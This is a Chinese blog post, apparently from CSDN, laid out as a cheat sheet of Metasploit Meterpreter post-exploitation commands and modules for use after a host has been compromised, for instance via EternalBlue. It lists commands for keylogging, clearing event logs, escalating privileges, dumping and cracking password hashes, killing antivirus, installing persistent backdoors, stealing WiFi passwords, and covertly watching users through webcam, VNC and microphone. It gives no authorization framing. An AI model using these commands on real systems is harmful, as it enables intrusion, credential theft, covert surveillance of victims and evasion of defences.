后渗透攻击命令和模块

最新推荐文章于 2022-11-25 12:51:37 发布
最新推荐文章于 2022-11-25 12:51:37 发布
阅读量1.3k 收藏 20
点赞数 2
分类专栏: 技术贴 渗透测试 文章标签: 后渗透 入侵 shell
本文链接:https://blog.csdn.net/weixin_59679023/article/details/124128830
版权

通过永恒之蓝或其他漏洞初步入侵目标主机后,如何扩大战果,下面给大家罗列了相关命令和模块

一、命令

1、arp

查看内网主机

2、background

将当前的会话转在后台运行。从而进行新的渗透测试。

如果想返回之前的会话,那么就输入“sessions -i 会话ID” 命令

3、clearev

清除系统,软件之类的所有登陆信息

4、download、upload

download可以下载目标系统的文件

upload可以上传本机文件到目标系统

目标机成功上传

5、edit

编辑命令,运行的是vim编辑器

查看目标机,成功写入

6、execute

执行命令,可执行脚本或程序

7、getprivs

查看当前用户具备的权限

8、getuid

查看 meterpreter 所在的用户组,或者说是你目前所拥有的权限

getsystem

提权为管理员

9、sysinfo

查看计算机系统和名称等详细信息

10、idletime

查看目标系统运行了多长时间

11、keyscan_start 开启键盘记录

keyscan_dump 键盘记录下载

keyscan_stop 停止键盘记录

12、load

加载一些带有其他功能(后门)的软件

13、lpwd与lcd

Lpwd:

显示本地目录,也就是你自己所在的自己系统的位置。

Lcd:

进入本地目录。也就是进入你自己系统的目录

14、ps

查看目标系统的所有进程。

如果没有root权限或者administrator权限,可以先查看进程,随后根据进程分析目标系统运行了什么软件。可以查找哪些软件有命令执行漏洞用来提权。甚至你还可以查看到目标系统用什么数据库之类的等等。

15、screenshot

截取目标系统屏幕

16、search

搜索目标系统的文件

17、shell

在目标系统打开一个命令行窗口,相当于cmd

出现乱码可以输入 chcp 65001

18、web_list 查看目标机器上是否有网络摄像头,并且列举出来

webcam_snap 连接目标系统的摄像头

二、模块

1、hashdump 获取目标系统哈希值

run post/windows/gather/hashdump

把获取到的哈希值在彩虹表中进行破解,访问md5在线解密破解,md5解密加密

2、migrate

run post/windows/manage/migrate

可以将meterpreter当前的进程移动到一个新的进程。

主要用来防软杀,或者进程不稳定的时候使用这个模块。

成功由2364进程迁移到2272进程

3、run killav 关闭对方杀软

run /post/windows/manage/killav

4、run post/windows/gather/enum_computers

枚举 Windows 域内所有用户,不包含目标主机

5、run persistence

写入硬盘,下次目标主机启动时,木马将会自启动(不一定成功,建议重新上传后门)

6、run post/multi/gather/wlan_geolocate

基于WLAN进行地理位置确认。

Ø/root/.msf4/loot ,如果通过该模块获得了地理信息,会在该文件夹下生 成TXT文件

7、run hashdump

获取目标系统哈希值,包括密码提示,需要有”system“权限

8、run service_manager

目标主机系统服务管理

9、run post/windows/wlan/wlan_profile

获取目标主机WiFi密码

10、run vnc

屏幕实时监控

配合run sound_recoder(录制声音) ,run webcam(开启摄像头),效果更佳

Cwillchris
关注
  • 2
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Metasploit 后渗透攻击模块
悦分享
11-30 808
在上图中,我们使用channel –1命令列出了所有可用的通信信道,然后使用channel –r [channel-id]命令选择了读取数据的通信信道。Meterpreter的另一个强大功能是可以计算出目标系统的闲置时间,以此推算用户的使用时间表,从而在用户不怎么使用计算机的时间段发起攻击。使用enumdesktops和getdesktop命令可以查看被渗透主机的桌面信息:enumdesktops命令列出了所有可以访问的桌面,而getdesktop列出了当前桌面的相关信息。可以如下图所示使用这个模块
渗透(三)
Y-Y-K的博客
04-18 1061
一.中间件提权 1.mysql提权 首先我们要知道的是在提权之前的几个必要条件 1)必须拥有root账号和密码。2)通过查看Mysql的版本号进行下一步渗透:当版本号Mysql大于5.1时,需在lib目录下新建plugin文件,才可以导出UDF;当大于5.6.34后,它会有安全模式 :--secure-file-priv,禁止使用sql命令写入或写出 其次,对应第一步,我们如何查找root...
Meterpreter(后渗透命令)笔记
5L2g556F5ZWl77yf
02-17 1928
Metasploit是一个框架,加载payload成功拿下靶机后可以进行的进一步操作称之为后渗透命令。 Meterpreter命令详情 下面是一些常用的后渗透命令及实验。 基本命令: 基本命令包含Meterpreter与MSF终端,Ruby接口,目标Shell等交互命令。 background命令 如果想在MSF终端执行其他任务,可以使用backgruond命令将MSF终端隐藏在后台。 se...
Metasploit之——其他后渗透模块
冰河的专栏
01-27 1047
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86669253 1.收集无线SSID信息 run post/windows/wlan/wlan_bss_list meterpreter > run post/windows/wlan/wlan_bss_list 2.收集无线Wifi密码 run post/wi...
渗透基础 – Windows常用命令
Adminxe的博客
05-05 679
0x00 前言 后渗透基础 – Windows常用命令 。如果知道目标存在某文件或者文件夹,又苦于不想一个一个的翻找,那么就试试 find + dir 命令吧。 0x01 全盘搜索命令 dir c:\ d:\ e:\ /s /b | find "简历.pdf" 搜索 C、D、E 盘下的文件名中带有 简历.pdf 的文件。 dir 显示目录中的文件和子目录列表。 /b 使用空格...
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
Meterpreter 不仅仅是一个简单的 shell,它是一个完整的后渗透环境,支持多种扩展模块和功能。它能够创建持久化的连接,即使在目标系统重启后也能保持控制。此外,Meterpreter 还允许测试者在不同的会话之间切换,...
meterpreter模块之后渗透攻击实战总结.docx
07-10
Meterpreter 是 Metasploit 框架中的一个高级交互式后渗透工具,它提供了一个功能丰富的 shell,允许攻击者在成功利用漏洞并获得目标系统的控制权后进行一系列的后续操作。Meterpreter 模块的强大之处在于它能进行...
渗透软件cs4中文版.zip
12-03
对于中文版的后渗透软件,它可能针对中国市场的特殊需求进行了优化,比如支持简体中文界面,适应国内网络环境,或者包含针对中文系统和应用的特定漏洞利用模块。 然而,必须强调的是,后渗透软件的使用必须遵守法律...
metasploit常用渗透命令.zip
最新发布
09-16
本资料“metasploit常用渗透命令”主要聚焦于Metasploit框架中的常用命令,帮助用户理解和掌握其核心功能。 在Metasploit框架中,主要涉及以下几个关键概念: 1. **Meterpreter**:Meterpreter是一种动态的、功能...
一些常用的网络攻击命令
05-23
在网络安全领域,了解和掌握一些基本的网络攻击命令是至关重要的,这可以帮助我们更好地理解攻击者的手段,从而提升防御能力。以下是一些常用的网络攻击命令的详细解释: 1. **Nmap**: - Nmap(Network Mapper)...
渗透后台扫描
01-30
扫描后台地址扫描目录。。。。。。。。。。。。。。。。。
渗透通过meterpreter模块提权
bring_coco的博客
11-06 939
继上一篇得到的普通session进行提权 提权方法: 一.提高程序的运行级别(uac) 说明:没有绕过uac,而且会弹出uac的框,如果用户点击执行才能成功获得更高权限的shell Msf模块: Exploit/windows/local/ask 1.试试看可不可以直接得到system权限 发现有报错 2.然后先把meterpreter这个session放到后台 3.加载此模块 Info可查看模块描述 用更高等级的水平去执行bypass低等级的uac设置 4.设置当前需要提权的session 此
metasploit渗透框架使用说明——后面介绍后渗透模块和网络渗透
记录并分享学习安全的知识点..
01-04 1029
一、模块划分 MSF是渗透测试领域最流行的渗透测试框架,它有以下几个模块:辅 助 模 块 (Auxiliary,扫描器)——扫描主机系统,寻找可用漏洞;渗透攻击模块 (Exploits)——选择并配置一个漏洞利用模块攻击载荷模块 (Payloads)——选择并配置一个攻击载荷模块;后渗透攻击模块 (Post)——用于内网渗透的各种操作;编 码 器 模 块 (Encoders)——选择编码技术,绕过杀软(或其他免杀方式);; 所有模块位置:/usr/share/metasploit-framework/m
后台填充_记一次后台漏洞挖掘渗透过程
weixin_30872577的博客
12-19 573
相关漏洞已提交官方,并修复,请勿未授权进行渗透测试。前言打工人,打工魂,打工都是人上人。好家伙一到工地,就来了一车砖.xls。话不多说咱开搬。是某学院的站点像这种官网主站都做得比较好了,我一般会找子站这种软柿子捏捏(太菜),经过一番查找,找到个看起来比较软的柿子,掏出我的xray+awvs就是一通扫,好家伙,啪一下,很快啊,页面就开始爆红。好吧,果然脏活累活只能亲自上手,只希望今天的砖不...
渗透测试——后渗透攻击
YT的博客
02-18 6230
Meterpreter 是一个提供了运行时刻可扩展远程 API 调用的攻击载荷模块,后渗透攻击脚本由 Meterpreter 客户端所解释,再远程调用 Meterpreter 服务端 (即运行在目标机上的攻击载荷) 提供的 API 来实现的。 1. persistence 后渗透攻击模块 persistence 帮助信息如下: 输入命令run persistence -X -i 5 -p 4...
Metasploit后渗透命令大全讲解——超详细
渗透测试
05-14 3158
文章目录前言一、基本后渗透命令1.帮助菜单2.后台命令3.机器ID和UUID命令4.通信信道5.获取用户和进程信息6.获取系统信息7.网络命令总结 前言 获取meterpreter权限后,使用后渗透命令完成目的操作 一、基本后渗透命令 获取meterpreter可以使用的命令,用来控制目标主机 1.帮助菜单 meterpreter > help Core Commands ============= Command Description
谈谈对后台登陆页面的渗透测试
09-10 2172
前言 有些朋友在渗透时扫描到后台登陆界面,却不知道如何入手。最近刚好在某公司做安全顾问,对目标固定的系统渗透有些体会。因此这里讲一下对网站后台登陆界面的渗透思路,希望能为大家提供一些帮助。 开始 本人在进入登陆界面时,一般都是先用万能密码什么的测下输入框有没有注入(现在很少见了)。如果没有,那就先拿admin,123456什么的测试下弱口令,不求运气爆棚一下就猜到密码。主要是...
实战渗透--一次对后台登录系统的简单渗透测试
tzyyyyyy的博客
11-25 4516
记录一次网页后台登录系统的渗透测试实战 拿到目标后台的管理员登录密码 以管理员身份进入后台
metasploit后渗透攻击:后门
06-02
Metasploit是一款流行的渗透测试工具,可用于发现系统漏洞、攻击目标系统并获取系统权限。后门是一种常见的攻击手段,它可让黑客...注意:上述操作仅用于合法的渗透测试和安全审计,任何未经授权的攻击行为都是非法的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cwillchris

你的鼓励将让我产出更多优质干货

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值